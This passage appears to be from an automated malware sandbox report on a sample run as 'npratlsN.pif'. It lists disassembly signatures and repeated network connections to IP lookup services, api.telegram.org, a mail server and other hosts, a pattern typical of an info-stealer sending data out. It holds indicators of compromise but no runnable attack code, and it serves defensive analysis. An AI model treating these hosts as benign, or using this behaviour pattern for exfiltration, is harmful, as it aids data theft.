Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E701Ah	14_2_255E6F70
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E4019h	14_2_255E3D70
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255EDC3Eh	14_2_255ED970
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E6411h	14_2_255E6168
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E701Ah	14_2_255E6F69
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255EFC2Eh	14_2_255EF960
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E5FB9h	14_2_255E5D10
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255EC9FEh	14_2_255EC730
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255EE9EEh	14_2_255EE720
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255EAE9Eh	14_2_255EABD0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E4471h	14_2_255E41C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255ECE8Eh	14_2_255ECBC0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E18A1h	14_2_255E15F8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then mov esp, ebp	14_2_255E9B88
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255EBC4Eh	14_2_255EB980
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255EEE7Eh	14_2_255EEBB0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E1449h	14_2_255E11A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E1CF9h	14_2_255E1A50
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255ED31Eh	14_2_255ED050
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255EF30Eh	14_2_255EF040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E02E9h	14_2_255E0040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E4D21h	14_2_255E4A78
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E3311h	14_2_255E3068
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255EB32Eh	14_2_255EB060
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E5709h	14_2_255E5460
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255EC0DEh	14_2_255EBE10
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255EE0CEh	14_2_255EDE00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E48C9h	14_2_255E4620
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E517Bh	14_2_255E4ED0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255EF79Eh	14_2_255EF4D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E3769h	14_2_255E34C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E0B99h	14_2_255E08F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255EB7BEh	14_2_255EB4F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255ED7AEh	14_2_255ED4E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E0741h	14_2_255E0498
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255EE55Eh	14_2_255EE290
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E5B61h	14_2_255E58B8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E2151h	14_2_255E1EA8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255EC56Eh	14_2_255EC2A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25655730h	14_2_25655438
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2565CEB8h	14_2_2565CBC0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25650C07h	14_2_25650960
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25659558h	14_2_25659260
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25651E36h	14_2_25651B68
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2565C060h	14_2_2565BD68
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2565EB68h	14_2_2565E870
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25654746h	14_2_25654478
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25657D70h	14_2_25657A78
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2565030Eh	14_2_25650040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25658238h	14_2_25657F40
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25651516h	14_2_25651248
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2565AD40h	14_2_2565AA48
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2565D848h	14_2_2565D550
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25653E26h	14_2_25653B58
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25656A50h	14_2_25656758
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25656F18h	14_2_25656C20
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25659A20h	14_2_25659728
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2565C528h	14_2_2565C230
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25653506h	14_2_25653238
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2565F030h	14_2_2565ED38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25655BF8h	14_2_25655900
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2565F4F9h	14_2_2565F200
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25654BD6h	14_2_25654908
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25658700h	14_2_25658408
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2565B208h	14_2_2565AF10
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25652BE6h	14_2_25652918
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2565DD10h	14_2_2565DA18
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2565E1D8h	14_2_2565DEE0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 256542B6h	14_2_25653FE8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 256573E0h	14_2_256570E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25659EE8h	14_2_25659BF0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 256522C6h	14_2_25651FF8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2565C9F0h	14_2_2565C6F8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25653997h	14_2_256536C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 256560C0h	14_2_25655DC8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2565F9C0h	14_2_2565F6C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2565079Eh	14_2_256504D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25658BC8h	14_2_256588D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 256519A6h	14_2_256516D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2565B6D0h	14_2_2565B3D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2565BB98h	14_2_2565B8A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25653076h	14_2_25652DA8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2565E6A0h	14_2_2565E3A8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 256578A8h	14_2_256575B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25651086h	14_2_25650DB8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2565A3B0h	14_2_2565A0B8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2565A878h	14_2_2565A580
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25652756h	14_2_25652488
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2565D380h	14_2_2565D088
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25656588h	14_2_25656290
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25655107h	14_2_25654D98
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25659090h	14_2_25658D98
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25691190h	14_2_25690E98
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25690800h	14_2_25690508
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25690CC8h	14_2_256909D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 25690338h	14_2_25690040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	14_2_256B0040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	14_2_256B0006
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	14_2_25D74C9C
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	14_2_25D77AC0

Source: global traffic	DNS query: name: amazonenviro.com
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: api.telegram.org
Source: global traffic	DNS query: name: mail.irco.com.sa

Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49757 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:49758 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52744 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52746 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52748 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52750 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52752 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52755 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52756 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52758 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52759 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52761 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52762 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52764 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52766 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52769 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52772 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52771 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52775 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52776 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52779 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52780 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52782 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:52783 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52785 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52787 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52790 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52792 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52795 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52796 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.4:49737 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49754 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:49754 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:49754 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52742 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52745 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52747 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52749 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52751 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52753 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52754 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52753 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52757 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52753 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52760 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52763 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52765 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52767 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52768 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52770 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52768 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52773 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52768 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52777 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52778 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52781 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52784 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52786 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52788 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52791 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:52793 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.4:49740 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49740 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49740 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49740 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.4:49757 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:49757 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:49757 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:49757 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:49757 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:49757 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:49757 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:49757 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:49757 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:49758 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:49758 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:49758 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:49758 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:49758 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:49758 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52744 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52744 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52744 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52744 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52744 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52744 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52746 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52746 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52746 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52746 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52746 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52746 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52748 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52748 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52748 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52748 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52748 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52748 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52750 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52750 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52750 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52750 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52750 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52750 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52752 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52752 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52752 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52752 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52752 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52752 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52755 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52755 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52755 -> 104.21.16.1:443
Source: global traffic	TCP traffic: 192.168.2.4:52756 -> 104.21.16.1:443
